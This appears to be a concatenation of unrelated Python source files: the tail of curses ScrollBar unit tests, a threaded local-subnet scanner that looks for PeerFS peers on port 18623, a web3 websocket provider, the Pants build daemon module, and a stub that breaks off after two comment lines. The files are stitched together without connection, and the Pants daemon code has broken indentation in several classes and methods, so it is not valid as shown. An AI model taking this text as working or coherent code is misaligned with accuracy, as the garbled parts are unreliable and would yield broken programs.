        {0: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
         6: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
         7: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)]},
        layout.font_attr_segs)

  def testLayoutIsCorrectForMiddlePosition(self):
    """At the midpoint, the block sits on the middle row (3)."""
    scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 10, 20)
    layout = scroll_bar.layout()
    self.assertEqual(["UP"] + [" "] * 6 + ["DN"], layout.lines)
    self.assertEqual(
        {0: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
         3: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
         7: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)]},
        layout.font_attr_segs)

  def testClickCommandsAreCorrectForMiddlePosition(self):
    """Arrow rows scroll by a line; track rows page; the block itself is inert."""
    scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 10, 20)
    self.assertIsNone(scroll_bar.get_click_command(-1))
    self.assertEqual(curses_ui._SCROLL_UP_A_LINE,
                     scroll_bar.get_click_command(0))
    self.assertEqual(curses_ui._SCROLL_UP,
                     scroll_bar.get_click_command(1))
    self.assertEqual(curses_ui._SCROLL_UP,
                     scroll_bar.get_click_command(2))
    self.assertIsNone(scroll_bar.get_click_command(3))
    self.assertEqual(curses_ui._SCROLL_DOWN,
                     scroll_bar.get_click_command(5))
    self.assertEqual(curses_ui._SCROLL_DOWN,
                     scroll_bar.get_click_command(6))
    self.assertEqual(curses_ui._SCROLL_DOWN_A_LINE,
                     scroll_bar.get_click_command(7))
    self.assertIsNone(scroll_bar.get_click_command(8))

  def testClickCommandsAreCorrectForBottomPosition(self):
    """With the block at the bottom, every track row above it scrolls up."""
    scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 19, 20)
    self.assertIsNone(scroll_bar.get_click_command(-1))
    self.assertEqual(curses_ui._SCROLL_UP_A_LINE,
                     scroll_bar.get_click_command(0))
    for i in range(1, 6):
      self.assertEqual(curses_ui._SCROLL_UP,
                       scroll_bar.get_click_command(i))
    self.assertIsNone(scroll_bar.get_click_command(6))
    self.assertEqual(curses_ui._SCROLL_DOWN_A_LINE,
                     scroll_bar.get_click_command(7))
    self.assertIsNone(scroll_bar.get_click_command(8))

  def testClickCommandsAreCorrectForScrollBarNotAtZeroMinY(self):
    """Click rows are interpreted relative to the bar's min_y offset (5)."""
    scroll_bar = curses_ui.ScrollBar(0, 5, 1, 12, 10, 20)
    self.assertIsNone(scroll_bar.get_click_command(0))
    self.assertIsNone(scroll_bar.get_click_command(4))
    self.assertEqual(curses_ui._SCROLL_UP_A_LINE,
                     scroll_bar.get_click_command(5))
    self.assertEqual(curses_ui._SCROLL_UP,
                     scroll_bar.get_click_command(6))
    self.assertEqual(curses_ui._SCROLL_UP,
                     scroll_bar.get_click_command(7))
    self.assertIsNone(scroll_bar.get_click_command(8))
    self.assertEqual(curses_ui._SCROLL_DOWN,
                     scroll_bar.get_click_command(10))
    self.assertEqual(curses_ui._SCROLL_DOWN,
                     scroll_bar.get_click_command(11))
    self.assertEqual(curses_ui._SCROLL_DOWN_A_LINE,
                     scroll_bar.get_click_command(12))
    self.assertIsNone(scroll_bar.get_click_command(13))
if __name__ == "__main__":
  # Discover and run all test cases defined in this module.
  googletest.main()
|
nodefinder.py | from threading import Thread, Lock
from time import perf_counter
from sys import stderr
from time import sleep
import socket, requests
# IPv4 template for the local /24 subnet scanned below (hosts .0-.254).
BASE_IP = "192.168.1.%i"
# TCP port probed to detect a PeerFS peer.
CHECKPORT = 18623
# Port of the HTTP stats endpoint used to confirm an active node.
SERVERPORT = 18623
# Hosts where CHECKPORT accepted a connection.
IPS = []
# Subset of IPS that also answered the /fetchstats HTTP request.
activenodes = []
def get_ip():
    """Return this machine's primary IPv4 address, or '127.0.0.1' on failure.

    Connecting a UDP socket makes the OS choose the outgoing interface; the
    target address does not even have to be reachable, since UDP connect()
    sends no packets.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as probe:
        try:
            probe.connect(('10.255.255.255', 1))
            return probe.getsockname()[0]
        except Exception:
            return '127.0.0.1'
class Threader:
    """Run queued (function, args) jobs on a fixed pool of daemon threads.

    Queue jobs with append() before calling start(); each worker pops jobs
    until the queue drains or stop() is called, then deregisters itself.
    """

    def __init__(self, threads=30):
        # Guards self.threads (workers remove themselves on exit).
        self.thread_lock = Lock()
        # Guards the pending-job list.
        self.functions_lock = Lock()
        self.functions = []
        self.threads = []
        self.nthreads = threads
        self.running = True
        # Shared by callers that want to serialize console output.
        self.print_lock = Lock()

    def stop(self) -> None:
        """Ask all workers to exit after their current job."""
        self.running = False

    def append(self, function, *args) -> None:
        """Queue `function(*args)` for execution by a worker thread."""
        self.functions.append((function, args))

    def start(self) -> None:
        """Spawn the worker threads."""
        for _ in range(self.nthreads):
            thread = Thread(target=self.worker, daemon=True)
            # The worker needs its own Thread object so it can deregister
            # itself; inject it as the target's argument after creation.
            thread._args = (thread, )
            self.threads.append(thread)
            thread.start()

    def join(self) -> None:
        """Block until every worker thread has finished."""
        # Iterate over a snapshot: workers remove themselves from
        # self.threads as they finish, and mutating a list while iterating
        # it skips elements (and could miss threads to join).
        for thread in list(self.threads):
            thread.join()

    def worker(self, thread: Thread) -> None:
        """Worker loop: pop and run jobs until the queue drains or stop()."""
        while self.running:
            # Check emptiness and pop under the same lock. The previous
            # version tested len(self.functions) outside the lock, so two
            # workers could race past the check and one would raise
            # IndexError on the pop.
            with self.functions_lock:
                if not self.functions:
                    break
                function, args = self.functions.pop(0)
            function(*args)
        with self.thread_lock:
            self.threads.remove(thread)
# Timestamp used for the relative [elapsed] prefixes in log output below.
start = perf_counter()
# Short socket timeout so unreachable hosts/closed ports fail fast.
socket.setdefaulttimeout(0.1)
def connect(hostname, port):
    """Probe hostname:port with a TCP connect and record accepting hosts.

    Appends matches to the module-level IPS list; logging goes to stderr
    under the shared print lock (`threader` is defined at module level
    before this runs).
    """
    # No `global IPS` needed: the list is mutated in place, never rebound.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        # connect_ex returns an errno (0 on success) instead of raising.
        result = sock.connect_ex((hostname, port))
        with threader.print_lock:
            if result == 0:
                stderr.write(f"[{perf_counter() - start:.5f}] PeerFS port found at {hostname}\n")
                IPS.append(hostname)
# Scan the /24 subnet for open PeerFS ports with a small thread pool.
threader = Threader(10)
for i in range(255):
    threader.append(connect, BASE_IP % i, CHECKPORT)
threader.start()
threader.join()
print(f"[{perf_counter() - start:.5f}] Done searching for ips")
# Ask every candidate for its stats endpoint to confirm it runs a node.
for ip in IPS:
    try:
        # The response body is unused; reaching the endpoint is the check.
        requests.get(f"http://{ip}:{SERVERPORT}/fetchstats")
        print(f"[{perf_counter() - start:.5f}] Found an active node at " + ip + "!")
        activenodes.append(ip)
    except requests.RequestException:
        # A bare `except:` here also swallowed KeyboardInterrupt/SystemExit;
        # only network/HTTP failures mean "not a node".
        print(f"[{perf_counter() - start:.5f}] {ip} is not running a node.")
|
websocket.py | import asyncio
import json
import logging
import os
from threading import (
Thread,
)
from types import (
TracebackType,
)
from typing import (
Any,
Optional,
Type,
Union,
)
from eth_typing import (
URI,
)
from websockets.client import (
connect,
)
from websockets.legacy.client import (
WebSocketClientProtocol,
)
from web3.exceptions import (
ValidationError,
)
from web3.providers.base import (
JSONBaseProvider,
)
from web3.types import (
RPCEndpoint,
RPCResponse,
)
# Keyword arguments callers may not pass through to websockets.connect():
# the provider supplies these itself.
RESTRICTED_WEBSOCKET_KWARGS = {'uri', 'loop'}
# Default seconds to wait for a websocket send/receive before timing out.
DEFAULT_WEBSOCKET_TIMEOUT = 10
def _start_event_loop(loop: asyncio.AbstractEventLoop) -> None:
    """Adopt *loop* on the current thread and run it until it is stopped."""
    asyncio.set_event_loop(loop)
    loop.run_forever()
    # Only reached after loop.stop(); release the loop's resources.
    loop.close()
def _get_threaded_loop() -> asyncio.AbstractEventLoop:
    """Create an event loop running forever on a background daemon thread."""
    new_loop = asyncio.new_event_loop()
    # Daemon thread: it must not keep the process alive on interpreter exit.
    thread_loop = Thread(target=_start_event_loop, args=(new_loop,), daemon=True)
    thread_loop.start()
    return new_loop
def get_default_endpoint() -> URI:
    """Return the default websocket endpoint, honoring WEB3_WS_PROVIDER_URI."""
    uri = os.environ.get('WEB3_WS_PROVIDER_URI', 'ws://127.0.0.1:8546')
    return URI(uri)
class PersistentWebSocket:
    """An async context manager holding one websocket open across requests.

    The connection is opened lazily on the first __aenter__ and deliberately
    kept open on normal exit; it is only torn down when the block exits with
    an exception, so the next use reconnects.
    """

    def __init__(
        self, endpoint_uri: URI, loop: asyncio.AbstractEventLoop, websocket_kwargs: Any
    ) -> None:
        # None until the first __aenter__ establishes the connection.
        self.ws: Optional[WebSocketClientProtocol] = None
        self.endpoint_uri = endpoint_uri
        self.loop = loop
        self.websocket_kwargs = websocket_kwargs

    async def __aenter__(self) -> WebSocketClientProtocol:
        if self.ws is None:
            self.ws = await connect(
                uri=self.endpoint_uri, loop=self.loop, **self.websocket_kwargs
            )
        return self.ws

    async def __aexit__(
        self, exc_type: Type[BaseException], exc_val: BaseException, exc_tb: TracebackType
    ) -> None:
        if exc_val is not None:
            # Best-effort close; the socket may already be dead.
            try:
                await self.ws.close()
            except Exception:
                pass
            # Drop the broken connection so the next __aenter__ reconnects.
            self.ws = None
class WebsocketProvider(JSONBaseProvider):
    """JSON-RPC provider that talks to a node over a persistent websocket.

    All websocket I/O runs on a single class-wide event loop living on a
    background daemon thread; make_request() submits coroutines to it and
    blocks on the result.
    """

    logger = logging.getLogger("web3.providers.WebsocketProvider")
    # Shared, lazily created background event loop (one per process).
    _loop = None

    def __init__(
        self,
        endpoint_uri: Optional[Union[URI, str]] = None,
        websocket_kwargs: Optional[Any] = None,
        websocket_timeout: int = DEFAULT_WEBSOCKET_TIMEOUT,
    ) -> None:
        """
        :param endpoint_uri: ws:// or wss:// URI of the node; falls back to
            the WEB3_WS_PROVIDER_URI environment variable / localhost.
        :param websocket_kwargs: extra kwargs for websockets.connect();
            'uri' and 'loop' are reserved and rejected.
        :param websocket_timeout: per-send/receive timeout in seconds.
        """
        # Resolve the default before wrapping in URI(): the previous code
        # called URI(None) first, which only worked because NewType is a
        # no-op at runtime.
        if endpoint_uri is None:
            self.endpoint_uri = get_default_endpoint()
        else:
            self.endpoint_uri = URI(endpoint_uri)
        self.websocket_timeout = websocket_timeout
        if WebsocketProvider._loop is None:
            WebsocketProvider._loop = _get_threaded_loop()
        if websocket_kwargs is None:
            websocket_kwargs = {}
        else:
            found_restricted_keys = set(websocket_kwargs.keys()).intersection(
                RESTRICTED_WEBSOCKET_KWARGS
            )
            if found_restricted_keys:
                raise ValidationError(
                    '{0} are not allowed in websocket_kwargs, '
                    'found: {1}'.format(RESTRICTED_WEBSOCKET_KWARGS, found_restricted_keys)
                )
        self.conn = PersistentWebSocket(
            self.endpoint_uri, WebsocketProvider._loop, websocket_kwargs
        )
        super().__init__()

    def __str__(self) -> str:
        return "WS connection {0}".format(self.endpoint_uri)

    async def coro_make_request(self, request_data: bytes) -> RPCResponse:
        """Send one encoded request and await its JSON-decoded response."""
        async with self.conn as conn:
            await asyncio.wait_for(
                conn.send(request_data),
                timeout=self.websocket_timeout
            )
            return json.loads(
                await asyncio.wait_for(
                    conn.recv(),
                    timeout=self.websocket_timeout
                )
            )

    def make_request(self, method: RPCEndpoint, params: Any) -> RPCResponse:
        """Encode a JSON-RPC call, run it on the shared loop, and block for the reply."""
        self.logger.debug("Making request WebSocket. URI: %s, "
                          "Method: %s", self.endpoint_uri, method)
        request_data = self.encode_rpc_request(method, params)
        # Hand the coroutine to the background loop's thread and wait.
        future = asyncio.run_coroutine_threadsafe(
            self.coro_make_request(request_data),
            WebsocketProvider._loop
        )
        return future.result()
|
pants_daemon.py | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import os
import sys
import threading
from contextlib import contextmanager
from setproctitle import setproctitle as set_process_title
from pants.base.build_environment import get_buildroot
from pants.base.exception_sink import ExceptionSink, SignalHandler
from pants.base.exiter import Exiter
from pants.bin.daemon_pants_runner import DaemonPantsRunner
from pants.engine.native import Native
from pants.init.engine_initializer import EngineInitializer
from pants.init.logging import init_rust_logger, setup_logging
from pants.init.options_initializer import BuildConfigInitializer
from pants.option.arg_splitter import GLOBAL_SCOPE
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.pantsd.process_manager import FingerprintedProcessManager
from pants.pantsd.service.fs_event_service import FSEventService
from pants.pantsd.service.pailgun_service import PailgunService
from pants.pantsd.service.pants_service import PantsServices
from pants.pantsd.service.scheduler_service import SchedulerService
from pants.pantsd.service.store_gc_service import StoreGCService
from pants.pantsd.watchman_launcher import WatchmanLauncher
from pants.util.collections import combined_dict
from pants.util.contextutil import stdio_as
from pants.util.memo import memoized_property
from pants.util.objects import datatype
from pants.util.strutil import ensure_text
class _LoggerStream(object):
"""A sys.std{out,err} replacement that pipes output to a logger.
N.B. `logging.Logger` expects unicode. However, most of our outstream logic, such as in `exiter.py`,
will use `sys.std{out,err}.buffer` and thus a bytes interface. So, we must provide a `buffer`
property, and change the semantics of the buffer to always convert the message to unicode. This
is an unfortunate code smell, as `logging` does not expose a bytes interface so this is
the best solution we could think of.
"""
def __init__(self, logger, log_level, handler):
"""
:param logging.Logger logger: The logger instance to emit writes to.
:param int log_level: The log level to use for the given logger.
:param Handler handler: The underlying log handler, for determining the fileno
to support faulthandler logging.
"""
self._logger = logger
self._log_level = log_level
self._handler = handler
def write(self, msg):
msg = ensure_text(msg)
for line in msg.rstrip().splitlines():
# The log only accepts text, and will raise a decoding error if the default encoding is ascii
# if provided a bytes input for unicode text.
line = ensure_text(line)
self._logger.log(self._log_level, line.rstrip())
def flush(self):
return
def isatty(self):
return False
def fileno(self):
return self._handler.stream.fileno()
@property
def buffer(self):
return self
class PantsDaemonSignalHandler(SignalHandler):
  """Signal handler that tears down the daemon (but not watchman) on SIGINT."""

  def __init__(self, daemon):
    """
    :param PantsDaemon daemon: The daemon instance to terminate on SIGINT.
    """
    super().__init__()
    self._daemon = daemon

  def handle_sigint(self, signum, _frame):
    # Leave watchman running: only the pantsd services are torn down.
    self._daemon.terminate(include_watchman=False)
class PantsDaemon(FingerprintedProcessManager):
"""A daemon that manages PantsService instances."""
JOIN_TIMEOUT_SECONDS = 1
LOG_NAME = 'pantsd.log'
  class StartupFailure(Exception):
    """Represents a failure to start pantsd."""

  class RuntimeFailure(Exception):
    """Represents a pantsd failure at runtime, usually from an underlying service failure."""

  class Handle(datatype([('pid', int), ('port', int), ('metadata_base_dir', str)])):
    """A handle to a "probably running" pantsd instance.

    We attempt to verify that the pantsd instance is still running when we create a Handle, but
    after it has been created it is entirely possible that the pantsd instance perishes.
    """
  class Factory:
    """Builds and (re)launches PantsDaemon instances from bootstrap options."""

    @classmethod
    def maybe_launch(cls, options_bootstrapper):
      """Creates and launches a daemon instance if one does not already exist.

      :param OptionsBootstrapper options_bootstrapper: The bootstrap options.
      :returns: A Handle for the running pantsd instance.
      :rtype: PantsDaemon.Handle
      """
      # Probe with a cheap, partially-initialized instance first to avoid
      # paying full engine setup when the daemon is already up to date.
      stub_pantsd = cls.create(options_bootstrapper, full_init=False)
      with stub_pantsd._services.lifecycle_lock:
        if stub_pantsd.needs_restart(stub_pantsd.options_fingerprint):
          # Once we determine we actually need to launch, recreate with full initialization.
          pantsd = cls.create(options_bootstrapper)
          return pantsd.launch()
        else:
          # We're already launched.
          return PantsDaemon.Handle(
            stub_pantsd.await_pid(10),
            stub_pantsd.read_named_socket('pailgun', int),
            stub_pantsd._metadata_base_dir,
          )

    @classmethod
    def restart(cls, options_bootstrapper):
      """Restarts a running daemon instance.

      :param OptionsBootstrapper options_bootstrapper: The bootstrap options.
      :returns: A Handle for the pantsd instance.
      :rtype: PantsDaemon.Handle
      """
      pantsd = cls.create(options_bootstrapper)
      with pantsd._services.lifecycle_lock:
        # N.B. This will call `pantsd.terminate()` before starting.
        return pantsd.launch()

    @classmethod
    def create(cls, options_bootstrapper, full_init=True):
      """
      :param OptionsBootstrapper options_bootstrapper: The bootstrap options.
      :param bool full_init: Whether or not to fully initialize an engine et al for the purposes
                             of spawning a new daemon. `full_init=False` is intended primarily
                             for lightweight lifecycle checks (since there is a ~1s overhead to
                             initialize the engine). See the impl of `maybe_launch` for an example
                             of the intended usage.
      """
      bootstrap_options = options_bootstrapper.bootstrap_options
      bootstrap_options_values = bootstrap_options.for_global_scope()
      # TODO: https://github.com/pantsbuild/pants/issues/3479
      watchman = WatchmanLauncher.create(bootstrap_options_values).watchman
      if full_init:
        build_root = get_buildroot()
        native = Native()
        build_config = BuildConfigInitializer.get(options_bootstrapper)
        legacy_graph_scheduler = EngineInitializer.setup_legacy_graph(native,
                                                                      options_bootstrapper,
                                                                      build_config)
        services = cls._setup_services(
          build_root,
          bootstrap_options_values,
          legacy_graph_scheduler,
          watchman
        )
      else:
        # Lightweight mode: no engine or services; only enough state for
        # lifecycle checks like needs_restart().
        build_root = None
        native = None
        services = PantsServices()
      return PantsDaemon(
        native=native,
        build_root=build_root,
        work_dir=bootstrap_options_values.pants_workdir,
        log_level=bootstrap_options_values.level.upper(),
        services=services,
        metadata_base_dir=bootstrap_options_values.pants_subprocessdir,
        bootstrap_options=bootstrap_options
      )
@staticmethod
def _setup_services(build_root, bootstrap_options, legacy_graph_scheduler, watchman):
    """Initialize pantsd services.
    :param string build_root: The pants build root.
    :param Options bootstrap_options: The global bootstrap option values.
    :param legacy_graph_scheduler: The engine scheduler the services operate on.
    :param watchman: The watchman instance used for filesystem event watching.
    :returns: A PantsServices instance.
    """
    should_shutdown_after_run = bootstrap_options.shutdown_pantsd_after_run
    fs_event_service = FSEventService(
        watchman,
        build_root,
    )
    pidfile_absolute = PantsDaemon.metadata_file_path('pantsd', 'pid', bootstrap_options.pants_subprocessdir)
    if pidfile_absolute.startswith(build_root):
        pidfile = os.path.relpath(pidfile_absolute, build_root)
    else:
        # Only paths under the buildroot can be watched, so a pidfile outside
        # it cannot be monitored for changes.
        pidfile = None
        logging.getLogger(__name__).warning(
            'Not watching pantsd pidfile because subprocessdir is outside of buildroot. Having '
            'subprocessdir be a child of buildroot (as it is by default) may help avoid stray '
            'pantsd processes.'
        )
    scheduler_service = SchedulerService(
        fs_event_service,
        legacy_graph_scheduler,
        build_root,
        PantsDaemon.compute_invalidation_globs(bootstrap_options),
        pidfile,
    )
    pailgun_service = PailgunService(
        (bootstrap_options.pantsd_pailgun_host, bootstrap_options.pantsd_pailgun_port),
        DaemonPantsRunner,
        scheduler_service,
        should_shutdown_after_run,
    )
    store_gc_service = StoreGCService(legacy_graph_scheduler.scheduler)
    return PantsServices(
        services=(fs_event_service, scheduler_service, pailgun_service, store_gc_service),
        port_map=dict(pailgun=pailgun_service.pailgun_port),
    )
@staticmethod
def compute_invalidation_globs(bootstrap_options):
    """
    Combine --pythonpath and --pants_config_files(pants.ini) files that are in {buildroot} dir
    with those invalidation_globs provided by users
    :param bootstrap_options: The global bootstrap option values.
    :return: A list of invalidation_globs
    """
    buildroot = get_buildroot()
    invalidation_globs = []
    globs = bootstrap_options.pythonpath + \
            bootstrap_options.pants_config_files + \
            bootstrap_options.pantsd_invalidation_globs
    for glob in globs:
        glob_relpath = os.path.relpath(glob, buildroot)
        if glob_relpath and (not glob_relpath.startswith("../")):
            # Watch both the path itself and everything beneath it.
            invalidation_globs.extend([glob_relpath, glob_relpath + '/**'])
        else:
            # Paths outside the buildroot cannot be watched.
            # NOTE(review): the "../" test assumes POSIX separators; on Windows
            # os.path.relpath yields "..\\" prefixes -- confirm if supported.
            logging.getLogger(__name__).warning("Changes to {}, outside of the buildroot"
                                                ", will not be invalidated.".format(glob))
    return invalidation_globs
def __init__(self, native, build_root, work_dir, log_level, services,
             metadata_base_dir, bootstrap_options=None):
    """
    :param Native native: A `Native` instance.
    :param string build_root: The pants build root.
    :param string work_dir: The pants work directory.
    :param string log_level: The log level to use for daemon logging.
    :param PantsServices services: A registry of services to use in this run.
    :param string metadata_base_dir: The ProcessManager metadata base dir.
    :param Options bootstrap_options: The bootstrap options, if available.
    """
    super().__init__(name='pantsd', metadata_base_dir=metadata_base_dir)
    self._native = native
    self._build_root = build_root
    self._work_dir = work_dir
    self._log_level = log_level
    self._services = services
    self._bootstrap_options = bootstrap_options
    # Default to showing rust 3rdparty logs when bootstrap options are
    # unavailable (e.g. partially initialized instances).
    self._log_show_rust_3rdparty = bootstrap_options.for_global_scope().log_show_rust_3rdparty if bootstrap_options else True
    self._log_dir = os.path.join(work_dir, self.name)
    self._logger = logging.getLogger(__name__)
    # N.B. This Event is used as nothing more than a convenient atomic flag - nothing waits on it.
    self._kill_switch = threading.Event()
@memoized_property
def watchman_launcher(self):
    """A lazily-created WatchmanLauncher built from this daemon's bootstrap options."""
    return WatchmanLauncher.create(self._bootstrap_options.for_global_scope())
@property
def is_killed(self):
    """True once `shutdown` has flipped the kill switch for the main loop."""
    return self._kill_switch.is_set()
@property
def options_fingerprint(self):
    """A fingerprint of the daemon-relevant global options, used to detect restarts."""
    return OptionsFingerprinter.combined_options_fingerprint_for_scope(
        GLOBAL_SCOPE,
        self._bootstrap_options,
        fingerprint_key='daemon',
        invert=True
    )
def shutdown(self, service_thread_map):
    """Gracefully terminate all services and kill the main PantsDaemon loop."""
    with self._services.lifecycle_lock:
        # Stop each service, then give its thread a bounded window to exit.
        for svc, svc_thread in service_thread_map.items():
            self._logger.info('terminating pantsd service: {}'.format(svc))
            svc.terminate()
            svc_thread.join(self.JOIN_TIMEOUT_SECONDS)
        self._logger.info('terminating pantsd')
        # Flipping the kill switch ends the `_run_services` monitor loop.
        self._kill_switch.set()
@staticmethod
def _close_stdio():
    """Close stdio streams to avoid output in the tty that launched pantsd."""
    for fd in (sys.stdin, sys.stdout, sys.stderr):
        file_no = fd.fileno()
        fd.flush()
        fd.close()
        # NOTE(review): `fd.close()` normally closes the underlying descriptor
        # already; the explicit os.close looks like a defensive double-close --
        # confirm it does not raise EBADF in practice.
        os.close(file_no)
@contextmanager
def _pantsd_logging(self):
    """A context manager that runs with pantsd logging.
    Asserts that stdio (represented by file handles 0, 1, 2) is closed to ensure that
    we can safely reuse those fd numbers.
    Yields a (log_handler_stream, native_log_filename) tuple.
    """
    # Ensure that stdio is closed so that we can safely reuse those file descriptors.
    for fd in (0, 1, 2):
        try:
            os.fdopen(fd)
            # fdopen succeeding means the descriptor is still open: refuse to continue.
            raise AssertionError(
                'pantsd logging cannot initialize while stdio is open: {}'.format(fd))
        except OSError:
            pass
    # Redirect stdio to /dev/null for the rest of the run, to reserve those file descriptors
    # for further forks.
    with stdio_as(stdin_fd=-1, stdout_fd=-1, stderr_fd=-1):
        # Reinitialize logging for the daemon context.
        init_rust_logger(self._log_level, self._log_show_rust_3rdparty)
        result = setup_logging(self._log_level, log_dir=self._log_dir, log_name=self.LOG_NAME, native=self._native)
        self._native.override_thread_logging_destination_to_just_pantsd()
        # Do a python-level redirect of stdout/stderr, which will not disturb `0,1,2`.
        # TODO: Consider giving these pipes/actual fds, in order to make them "deep" replacements
        # for `1,2`, and allow them to be used via `stdio_as`.
        sys.stdout = _LoggerStream(logging.getLogger(), logging.INFO, result.log_handler)
        sys.stderr = _LoggerStream(logging.getLogger(), logging.WARN, result.log_handler)
        self._logger.debug('logging initialized')
        yield (result.log_handler.stream, result.log_handler.native_filename)
def _setup_services(self, pants_services):
    """Run one-time setup for each registered service before the main loop starts."""
    for svc in pants_services.services:
        self._logger.info('setting up service {}'.format(svc))
        svc.setup(self._services)
@staticmethod
def _make_thread(service):
    """Create a daemonized thread that runs `service`, named after its class."""
    def _run():
        # Route this thread's log output to the pantsd log only.
        Native().override_thread_logging_destination_to_just_pantsd()
        service.run()
    thread = threading.Thread(
        target=_run,
        name="{}Thread".format(service.__class__.__name__),
    )
    # Daemonize so a wedged service cannot keep the process alive on exit.
    thread.daemon = True
    return thread
def _run_services(self, pants_services):
    """Service runner main loop.

    Starts one daemonized thread per service, records the daemon's pid and
    options fingerprint, then monitors the threads until the kill switch is
    set or a service thread dies (which triggers a full shutdown).
    :raises PantsDaemon.StartupFailure: if a service thread fails to start.
    :raises PantsDaemon.RuntimeFailure: if a service thread dies while running.
    """
    if not pants_services.services:
        self._logger.critical('no services to run, bailing!')
        return
    service_thread_map = {service: self._make_thread(service)
                          for service in pants_services.services}
    # Start services.
    for service, service_thread in service_thread_map.items():
        self._logger.info('starting service {}'.format(service))
        try:
            service_thread.start()
        except (RuntimeError, FSEventService.ServiceError):
            self.shutdown(service_thread_map)
            raise PantsDaemon.StartupFailure('service {} failed to start, shutting down!'.format(service))
    # Once all services are started, write our pid.
    self.write_pid()
    self.write_metadata_by_name('pantsd', self.FINGERPRINT_KEY, ensure_text(self.options_fingerprint))
    # Monitor services.
    while not self.is_killed:
        for service, service_thread in service_thread_map.items():
            if not service_thread.is_alive():
                self.shutdown(service_thread_map)
                raise PantsDaemon.RuntimeFailure('service failure for {}, shutting down!'.format(service))
            else:
                # Avoid excessive CPU utilization.
                service_thread.join(self.JOIN_TIMEOUT_SECONDS)
def _write_named_sockets(self, socket_map):
"""Write multiple named sockets using a socket mapping."""
for socket_name, socket_info in socket_map.items():
self.write_named_socket(socket_name, socket_info)
def run_sync(self):
    """Synchronously run pantsd.

    Closes inherited stdio, switches to daemon logging, installs exception/
    panic handling, publishes service socket metadata, then blocks in the
    service-runner main loop. Does not return until the daemon shuts down.
    """
    # Switch log output to the daemon's log stream from here forward.
    self._close_stdio()
    with self._pantsd_logging() as (log_stream, log_filename):
        # Register an exiter using os._exit to ensure we only close stdio streams once.
        ExceptionSink.reset_exiter(Exiter(exiter=os._exit))
        # We don't have any stdio streams to log to anymore, so we log to a file.
        # We don't override the faulthandler destination because the stream we get will proxy things
        # via the rust logging code, and faulthandler needs to be writing directly to a real file
        # descriptor. When pantsd logging was originally initialised, we already set up faulthandler
        # to log to the correct file descriptor, so don't override it.
        #
        # We can get tracebacks of the pantsd process by tailing the pantsd log and sending it
        # SIGUSR2.
        ExceptionSink.reset_interactive_output_stream(
            log_stream,
            override_faulthandler_destination=False,
        )
        # Reset the log location and the backtrace preference from the global bootstrap options.
        global_bootstrap_options = self._bootstrap_options.for_global_scope()
        ExceptionSink.reset_should_print_backtrace_to_terminal(
            global_bootstrap_options.print_exception_stacktrace)
        ExceptionSink.reset_log_location(global_bootstrap_options.pants_workdir)
        self._native.set_panic_handler()
        # Set the process name in ps output to 'pantsd' vs './pants compile src/etc:: -ldebug'.
        set_process_title('pantsd [{}]'.format(self._build_root))
        # Write service socket information to .pids.
        self._write_named_sockets(self._services.port_map)
        # Enter the main service runner loop.
        self._setup_services(self._services)
        self._run_services(self._services)
def post_fork_child(self):
    """Post-fork() child callback for ProcessManager.daemon_spawn().

    Re-executes the current interpreter with PANTS_ENTRYPOINT pointing at this
    module's `launch` function, so the spawned process boots straight into the
    daemon instead of a regular pants run.
    """
    entry_point = '{}:launch'.format(__name__)
    exec_env = combined_dict(os.environ, dict(PANTS_ENTRYPOINT=entry_point))
    # Pass all of sys.argv so that we can proxy arg flags e.g. `-ldebug`.
    cmd = [sys.executable] + sys.argv
    self._logger.debug('cmd is: PANTS_ENTRYPOINT={} {}'.format(entry_point, ' '.join(cmd)))
    # TODO: Improve error handling on launch failures.
    os.spawnve(os.P_NOWAIT, sys.executable, cmd, env=exec_env)
def needs_launch(self):
    """Determines if pantsd needs to be launched.
    N.B. This should always be called under care of the `lifecycle_lock`.
    :returns: True if the daemon needs launching, False otherwise.
    :rtype: bool
    """
    fingerprint = self.options_fingerprint
    self._logger.debug(
        'pantsd: is_alive={} new_fingerprint={} current_fingerprint={}'.format(
            self.is_alive(), fingerprint, self.fingerprint))
    return self.needs_restart(fingerprint)
def launch(self):
    """Launches pantsd in a subprocess.
    N.B. This should always be called under care of the `lifecycle_lock`.
    :returns: A Handle for the pantsd instance.
    :rtype: PantsDaemon.Handle
    """
    self.terminate(include_watchman=False)
    self.watchman_launcher.maybe_launch()
    self._logger.debug('launching pantsd')
    self.daemon_spawn()
    # Wait up to 60 seconds for pantsd to write its pidfile.
    pantsd_pid = self.await_pid(60)
    listening_port = self.read_named_socket('pailgun', int)
    # Log the pid we just awaited rather than re-reading `self.pid`, which
    # would perform a second (racy) metadata read of the same value.
    self._logger.debug('pantsd is running at pid {}, pailgun port is {}'
                       .format(pantsd_pid, listening_port))
    return self.Handle(pantsd_pid, listening_port, self._metadata_base_dir)
def terminate(self, include_watchman=True):
    """Terminates pantsd and watchman.
    N.B. This should always be called under care of the `lifecycle_lock`.
    """
    super().terminate()
    if not include_watchman:
        return
    self.watchman_launcher.terminate()
def needs_restart(self, option_fingerprint):
    """
    Overrides ProcessManager.needs_restart, to account for the case where pantsd is running
    but we want to shutdown after this run.
    :param option_fingerprint: A fingeprint of the global bootstrap options.
    :return: True if the daemon needs to restart.
    """
    shutdown_requested = self._bootstrap_options.for_global_scope().shutdown_pantsd_after_run
    if super().needs_restart(option_fingerprint):
        return True
    # A live daemon that was asked to shut down after its run also counts
    # as needing a restart.
    return self.is_alive() and shutdown_requested
def launch():
    """An external entrypoint that spawns a new pantsd instance."""
    # Reached via PANTS_ENTRYPOINT (set in `post_fork_child`) in the spawned process.
    PantsDaemon.Factory.create(OptionsBootstrapper.create()).run_sync()
|
wsideidentifier.py | #!/usr/bin/env python
# for mac: //instructions from https://opensource.com/article/19/5/python-3-default-mac
# //UNINSTALL HOMEBREW VERSIONS OF PYTHON FIRST!!
